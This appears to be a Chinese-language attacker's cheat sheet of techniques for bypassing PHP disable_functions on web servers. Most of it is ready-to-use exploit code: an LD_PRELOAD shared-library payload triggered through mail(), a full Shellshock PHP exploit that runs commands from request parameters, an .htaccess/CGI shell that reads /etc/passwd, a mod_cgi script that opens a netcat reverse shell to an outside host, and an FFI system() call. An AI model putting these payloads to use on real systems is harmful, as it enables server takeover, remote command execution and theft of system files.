bypass disable_function

主要參考https://www.anquanke.com/post/id/208451

0x01 LD_PRELOAD

LD_PRELOAD是什麼 : 參考 警惕UNIX下的LD_PRELOAD環境變數 https://blog.csdn.net/haoel/article/details/1602108

繞過原理: https://blog.csdn.net/weixin_33738982/article/details/87979967

攻擊思路:
1. 有上傳許可權,上傳特定的PHP指令碼,hack.so等
2. 上傳自定義的動態連結庫檔案 hack.so ( 檢視未封禁函式的載入函式 如readelf -s /usr/sbin/sendmail ,再改寫重名函式)

php指令碼參考( 根據mail()函式攻擊 )

<?php
putenv("LD_PRELOAD=/var/www/hack.so");
mail("[email protected]","","","","");

hack.so原始檔

#!c
#include <stdlib.h>
#include <stdio.h>
#include <string.h> 
 
void payload() {
        system("rm /tmp/check.txt");
}   
 
int  geteuid() {
if (getenv("LD_PRELOAD") == NULL) { return 0; }
unsetenv("LD_PRELOAD");
payload();
}

0x02 ShellShock

利用bash破殼漏洞（CVE-2014-6271），該漏洞存在於bash 1.14 – 4.3版本中
exp.php ,上傳利用即可 ?cmd=xxx

<?php 
# Exploit Title: PHP 5.x Shellshock Exploit (bypass disable_functions) 
# Google Dork: none 
# Date: 10/31/2014 
# Exploit Author: Ryan King (Starfall) 
# Vendor Homepage: http://php.net 
# Software Link: http://php.net/get/php-5.6.2.tar.bz2/from/a/mirror 
# Version: 5.* (tested on 5.6.2) 
# Tested on: Debian 7 and CentOS 5 and 6 
# CVE: CVE-2014-6271 

function shellshock($cmd) { // Execute a command via CVE-2014-6271 @mail.c:283 
   $tmp = tempnam(".","data"); 
   putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1"); 
   // In Safe Mode, the user may only alter environment variableswhose names 
   // begin with the prefixes supplied by this directive. 
   // By default, users will only be able to set environment variablesthat 
   // begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive isempty, 
   // PHP will let the user modify ANY environment variable! 
   //mail("a@127.0.0.1","","","","-bv"); // -bv so we don't actuallysend any mail 
   error_log('a',1);
   $output = @file_get_contents($tmp); 
   @unlink($tmp); 
   if($output != "") return $output; 
   else return "No output, or not vuln."; 
} 
echo shellshock($_REQUEST["cmd"]); 
?>

0x03 Apache Mod CGI

禁用 putenv 也可以利用

利用條件：

目錄下有寫許可權
apache 使用 apache_mod_php
Web 目錄給了 AllowOverride 許可權
啟用了mod_cgi

上傳.htaccess

Options +ExecCGI
AddHandler cgi-script .test

在上傳shell.test

#!/bin/bash
echo&&cat /etc/passwd

然後訪問shell.test

exp指令碼

<?php
$cmd = "nc -c '/bin/bash' xxx.xx.xx.xx 4444"; //command to be executed
$shellfile = "#!/bin/bashn"; //using a shellscript
$shellfile .= "echo -ne "Content-Type: text/html\n\n"n"; //header is needed, otherwise a 500 error is thrown when there is output
$shellfile .= "$cmd"; //executing $cmd
function checkEnabled($text,$condition,$yes,$no) //this surely can be shorter
{
    echo "$text: " . ($condition ? $yes : $no) . "<br>n";
}
if (!isset($_GET['checked']))
{
    @file_put_contents('.htaccess', "nSetEnv HTACCESS on", FILE_APPEND); //Append it to a .htaccess file to see whether .htaccess is allowed
    header('Location: ' . $_SERVER['PHP_SELF'] . '?checked=true'); //execute the script again to see if the htaccess test worked
}
else
{
    $modcgi = in_array('mod_cgi', apache_get_modules()); // mod_cgi enabled?
    $writable = is_writable('.'); //current dir writable?
    $htaccess = !empty($_SERVER['HTACCESS']); //htaccess enabled?
        checkEnabled("Mod-Cgi enabled",$modcgi,"Yes","No");
        checkEnabled("Is writable",$writable,"Yes","No");
        checkEnabled("htaccess working",$htaccess,"Yes","No");
    if(!($modcgi && $writable && $htaccess))
    {
        echo "Error. All of the above must be true for the script to work!"; //abort if not
    }
    else
    {
        checkEnabled("Backing up .htaccess",copy(".htaccess",".htaccess.bak"),"Suceeded! Saved in .htaccess.bak","Failed!"); //make a backup, cause you never know.
        checkEnabled("Write .htaccess file",file_put_contents('.htaccess',"Options +ExecCGInAddHandler cgi-script .dizzle"),"Succeeded!","Failed!"); //.dizzle is a nice extension
        checkEnabled("Write shell file",file_put_contents('shell.dizzle',$shellfile),"Succeeded!","Failed!"); //write the file
        checkEnabled("Chmod 777",chmod("shell.dizzle",0777),"Succeeded!","Failed!"); //rwx
        echo "Executing the script now. Check your listener <img src = 'shell.dizzle' style = 'display:none;'>"; //call the script
    }
}
?>

0x04 PHP-FPM

https://www.anquanke.com/post/id/208451#h2-4

0x05 UAF

Json Serializer UAF

利用json序列化中的堆溢位觸發，藉以繞過disable_function，影響範圍:
7.1 – all versions to date
7.2 < 7.2.19 (released: 30 May 2019)
7.3 < 7.3.6 (released: 30 May 2019)

GC UAF

利用的是PHP garbage collector程式中的堆溢位觸發，影響範圍為7.0-1.3

Backtrace UAF

影響版本是7.0-7.4

exp : https://www.anquanke.com/post/id/208451#h2-8

0x06 FFI擴充套件

條件: php>7.4，開啟了FFI擴充套件ffi.enable=true，我們可以通過FFI來呼叫C中的system進而達到執行命令的目的

exp:

<?php
$ffi = FFI::cdef("int system(const char *command);");
$ffi->system("whoami >/tmp/1");
echo file_get_contents("/tmp/1");
@unlink("/tmp/1");
?>

訪問即可獲得返回結果

0x07 ImageMagick

0x08 COM元件

待補充